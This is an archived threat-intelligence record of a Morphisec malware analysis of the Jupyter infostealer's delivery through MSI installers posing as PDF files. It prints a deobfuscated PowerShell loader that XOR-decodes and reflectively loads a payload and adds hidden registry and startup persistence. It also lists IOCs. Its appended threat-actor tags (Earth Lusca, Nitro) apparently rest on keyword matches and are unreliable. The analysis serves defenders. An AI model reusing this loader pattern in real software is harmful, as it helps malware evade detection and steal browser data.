{
	"id": "62333f31-f041-4bca-a5a4-aee05eefd841",
	"created_at": "2026-04-06T00:15:51.789606Z",
	"updated_at": "2026-04-10T03:36:48.258661Z",
	"deleted_at": null,
	"sha1_hash": "a8c24ad5188ca9469c1d4ec615ad5182cc311ae4",
	"title": "New Jupyter Evasive Delivery through MSI Installer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 808936,
	"plain_text": "New Jupyter Evasive Delivery through MSI Installer\r\nBy Nadav Lorber\r\nArchived: 2026-04-05 22:08:11 UTC\r\nIn 2020, Morphisec introduced the Jupyter infostealer, a .NET attack that primarily targets Chromium, Firefox,\r\nand Chrome browser data while also maintaining the additional capabilities of a backdoor. \r\nSince that time, Jupyter has remained active and highly evasive. It has continued to receive very low to zero\r\ndetections in the VirusTotal database, maintaining the ability to bypass detection solutions. \r\nThen, on 8 September 2021, we identified a new delivery chain within Jupyter that passes under the radar of\r\nsecurity solutions. Following this discovery, the Morphisec Labs team has been made aware of multiple high-level\r\ntargets that are under threat from the Jupyter infostealer. We are currently investigating the scope of the\r\ncampaign.\r\nThe blog post that follows outlines the new delivery chain, showcasing how threat actors continue to develop their\r\nattacks to become more efficient and evasive.\r\nEditor’s Note: This blog post has been updated as per the request of Advanced Installer. \r\nTechnical Details\r\nFigure 1: The attack flow of the new Jupyter infostealer\r\nThe MSI Payload\r\nIn this section, we will briefly examine some of the payload’s shared attributes in order to get an overview of what\r\nindicators to expect. This is based on the six variants that we have observed.\r\nPayload Size and Name\r\nLike previous Jupyter payloads, the size of the MSI payloads is consistently over 100 MB. 
This allows the\r\npayload to thwart online AV scanners, which commonly enforce an upload size limit.\r\nThe naming convention for the payload is:\r\nPotential document subjects\r\nWords are separated with a dash ‘-’\r\nEach word starts with a capital letter\r\nExamples can be found in the IOCs section under the heading “MSI Payload Names.” \r\nhttps://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer\r\nPage 1 of 8\n\nMSI Third-Party Installer Wizard\r\nThe payloads were generated with a trial version of Advanced Installer (version 18.6.1 build 2c9a75c6).\r\nAs described on their website, the Advanced Installer wizard is an ‘All-in-one’ application packaging tool. This\r\ntool gives threat actors an easy way to embed obscured script execution in an installer.\r\nCustomizing installer PowerShell operations is a legitimate functionality that the attackers misuse, as with other\r\nattack chains. This same operation is frequently used as part of legitimate products or services. We advise against\r\nflagging any PowerShell scripts originating from Advanced Installer without prior evaluation of the command\r\nitself. It is worth noting as well that PowerShell functionalities are also available in other installers.\r\nThe attribution can be found either in the file properties (OLE Compound) or in the Installer property table.\r\nFigure 2: OLE Compound file information\r\nFigure 3: Property table\r\nDecoy Installation Executable\r\nAs seen in Figure 1 above, all of the observed variants are described as Nitro Pro 13. Once the victim runs the\r\nMSI payload, it executes a legitimate installation binary of Nitro Pro 13. 
Correlating this attribution with the\r\nvariants’ file names suggests that the delivery method disguises the payload as a PDF document.\r\nFigure 4: Nitro Pro 13 Installation\r\nWhile all of the variants are described as Nitro, one of them actually contains SumatraPDF instead.\r\nFigure 5: Sumatra PDF installation\r\nDigital Signature\r\nTwo of the variants are signed with a (currently) valid certificate named ‘TACHOPARTS SP Z O O’.\r\nFigure 6: Tachoparts certificate\r\nBased on the following certificate data, we can assume that the threat actor either impersonated the certificate or\r\nstole it from a legitimate business in Poland.\r\nFigure 7: Tachoparts’ business information from Google\r\nAnother variant was signed with a revoked certificate named ‘OOO Sistema’.\r\nFigure 8: OOO Sistema certificate\r\nAs with the previous certificate, this one is also correlated with a legitimate business, and it was likewise either\r\nimpersonated or stolen from that business. 
\r\nFigure 9: OOO Sistema business information from Google\r\nThe other two variants are signed with certificates named:\r\nFORMICA Solutions a.s.\r\nOOO Ruvents\r\nThe PowerShell Execution\r\nThe initial suspicious indicator visible in dynamic analysis is the PowerShell command line spawned\r\nby msiexec.exe.\r\nCommand Line\r\nC:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -Noninteractive\r\n-ExecutionPolicy Bypass\r\n-File 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\pssEA35.ps1'\r\n-propFile 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\msiEA13.txt'\r\n-scriptFile 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\scrEA14.ps1'\r\n-scriptArgsFile 'C:\\Users\\\u003cUSERNAME\u003e\\AppData\\Local\\Temp\\scrEA15.txt'\r\n-propSep ' :\u003c-\u003e: '\r\n-testPrefix '_testValue.'\r\nCode block 1: CMD Shell command-line\r\nThis command line is generated by an Advanced Installer feature that executes the PowerShell\r\nloader as a ‘CustomAction’ defined in the MSI installer.\r\nThe file names within the parameters differ between variants but keep the same pattern. For example,\r\nin ‘scrEA14.ps1’ the ‘EA14’ portion is made up of four hex characters. 
These four characters differ between the\r\npayload variants.\r\nFigure 10: PowerShell loader embedded in the CustomAction within AdvancedInstaller\r\nJupyter PowerShell Loader\r\nThe PowerShell file passed in the -scriptFile parameter shown in Code block 1 is the Jupyter PowerShell\r\nloader.\r\nThis loader is very similar to the previous Jupyter loaders in that it remains highly evasive, with low to zero\r\ndetections on VirusTotal, which is rare for a full PowerShell loader (loader code with an embedded payload).\r\nWhile the Jupyter loaders are widely covered in our and other blogs, the new variant shares the same code pattern.\r\nThe following code block is a deobfuscated and beautified version of it:\r\n$b64_enc_payload='deducted';\r\n$random_path_str='jeiJBgXRTuVfsm';\r\n$payload_directory_path=\"$ENV:APPDATA\\Microsoft\\\"+$random_path_str;\r\n$enc_payload_path=$payload_directory_path+'\\'+$random_path_str+'.'+$random_path_str;\r\n[System.IO.File]::WriteAllBytes($enc_payload_path,\r\n[System.Convert]::FromBase64String($b64_enc_payload));\r\n$decode_and_execute_payload_script='below code embedded in comment'\r\n'''\r\n  $xor_key = \"deducted base64 key\";\r\n  $b64_enc_payload = [System.IO.File]::ReadAllBytes($enc_payload_path);\r\n  # Repeating-key XOR over the whole file: the inner loop walks the key and\r\n  # forces an exit once the last byte of the buffer has been processed.\r\n  For ($i = 0; $i -lt $b64_enc_payload.Count;) {\r\n    For ($y = 0; $y -lt $xor_key.Length; $y++) {\r\n      $b64_enc_payload[$i]=$b64_enc_payload[$i] -bxor $xor_key[$y];\r\n      $i++;\r\n      if($i -ge $b64_enc_payload.Count) {\r\n        $y=$xor_key.Length\r\n      }\r\n    }\r\n  };\r\n  [System.Reflection.Assembly]::Load($b64_enc_payload); # Loads the ‘interact’ method\r\n'''\r\nCreate_Registry_Key -reg_path('\u003cREG_PATH\u003e') -execution_command('Powershell -WindowStyle Hidden -ep Bypass -Command \" + $decode_and_execute_payload_script');\r\nCreate_Registry_Key -reg_path('\u003cREG_PATH\u003e') -execution_command $random_path_str.ToLower();\r\n$lnk_object=(New-Object -ComObject WScript.Shell).CreateShortcut($ENV:APPDATA+'\u003cStartup_Lnk_Path\u003e');\r\n$lnk_object.TargetPath=$payload_directory_path+'\\'+$random_path_str;\r\n$lnk_object.WindowStyle=7;\r\n$lnk_object.Save();\r\nIEX $decode_and_execute_payload_script;\r\nCode block 2: Deobfuscated Jupyter PowerShell loader\r\nNote that, like the previous versions, this one also reflectively loads a DLL that initializes execution under the\r\nDeimos namespace in the Mars class (Mars.Deimos).\r\nThe .NET DLL Payload\r\nIn our previous blog, we attributed the payloads to their internal version. The following table correlates the\r\nobserved internal version with the MSI payload’s first submission date and detections on VirusTotal.\r\nJupyter DLL Internal Version | VirusTotal First Submission | VirusTotal Detections\r\nSP-9 | 08 September 2021 | 1 / 57 malicious detections\r\nSP-10 | 08 September 2021 | 2 / 57 malicious detections\r\nSP-11 | 10 September 2021 | 0 / 57 malicious detections\r\nSP-13 | 13 September 2021 | 0 / 57 malicious detections\r\nSP-14 | 21 September 2021 | 0 / 57 malicious detections\r\nSP-16 | 21 September 2021 | 0 / 57 malicious detections\r\nWhile all of the .NET DLL payloads should be obfuscated, it appears that the SP-10 variant contains source-code\r\nstrings. The following figure presents the payload methods and class names.\r\nFigure 11: Jupyter .NET DLL Payload methods and classes\r\nConclusion\r\nThe evolution of the Jupyter infostealer/backdoor since we first identified it in 2020 proves the truth of the\r\nstatement that threat actors are always innovating. 
That this attack continues to have low or no detections on\r\nVirusTotal further indicates the facility with which threat actors evade detection-based solutions. It’s clear that a\r\nnew approach is required to threat prevention, as it’s likely these evasive attacks will continue.\r\nThis is why Morphisec architected its solutions with Automated Moving Target Defense to emphasize\r\ndeterministic prevention of evasive attacks instead of detection. Customers who leverage the Morphisec\r\nPreemptive Cyber Defense Platform on their endpoints, on-premises servers, and in the cloud can remain\r\nconfident that they are secure from evasive threats such as the Jupyter infostealer, regardless of the detection rate\r\nin VirusTotal.\r\nIOCs\r\nMSI Payload Hashes\r\nAdvancedInstaller PowerShell Hash\r\n88748aae11029228d84aef0855f4bc084dfd70450db1f7029746d8bc85182f93\r\nJupyter PowerShell Loader Hashes\r\nJupyter Payloads\r\nC2 IPs\r\nMSI Payload Names\r\nMetlife-Disability-Waiver-Of-Premium-Benefit-Rider.msi\r\nMedical-Engagement-Scale-Questionnaire.msi\r\nDue-Diligence-Checklist-For-Oil-And-Gas-Properties.msi\r\nNon-Renewal-Of-Lease-Letter-To-Landlord-From-Tenant.msi\r\nFedex-Tracking-By-Shipper-Receipt.msi\r\nChristian-Doctrine-Clauses-List.msi\r\nOmnicell-Cabinet-User-Manual.msi\r\nWells-Fargo-Subpoena-Processing-Department-Phoenix-Az.msi\r\nBulgarian Power Burst Training pdf.msiapp.msi\r\nAbout the author\r\nNadav Lorber\r\nSecurity Research Tech Lead\r\nNadav Lorber is a leader on Morphisec’s cutting-edge threat research team. He began his career in threat\r\nintelligence in 2013, where he was a SOC Specialist for the Israeli government’s military intelligence department.\r\nSince joining Morphisec, Nadav has helped uncover key insights on topics like Jupyter Infostealer, Log4j, and the\r\nSnip3 crypter.\r\nSource: https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer"
	],
	"report_names": [
		"new-jupyter-evasive-delivery-through-msi-installer"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9041c438-4bc0-4863-b89c-a32bba33903c",
			"created_at": "2023-01-06T13:46:38.232751Z",
			"updated_at": "2026-04-10T02:00:02.888195Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove"
			],
			"source_name": "MISPGALAXY:Nitro",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a2b44a04-a080-4465-973d-976ce53777de",
			"created_at": "2022-10-25T16:07:23.911791Z",
			"updated_at": "2026-04-10T02:00:04.786538Z",
			"deleted_at": null,
			"main_name": "Nitro",
			"aliases": [
				"Covert Grove",
				"Nitro"
			],
			"source_name": "ETDA:Nitro",
			"tools": [
				"AngryRebel",
				"Backdoor.Apocalipto",
				"Chymine",
				"Darkmoon",
				"Farfli",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Moudour",
				"Mydoor",
				"PCClient",
				"PCRat",
				"Poison Ivy",
				"SPIVY",
				"Spindest",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434551,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a8c24ad5188ca9469c1d4ec615ad5182cc311ae4.pdf",
		"text": "https://archive.orkl.eu/a8c24ad5188ca9469c1d4ec615ad5182cc311ae4.txt",
		"img": "https://archive.orkl.eu/a8c24ad5188ca9469c1d4ec615ad5182cc311ae4.jpg"
	}
}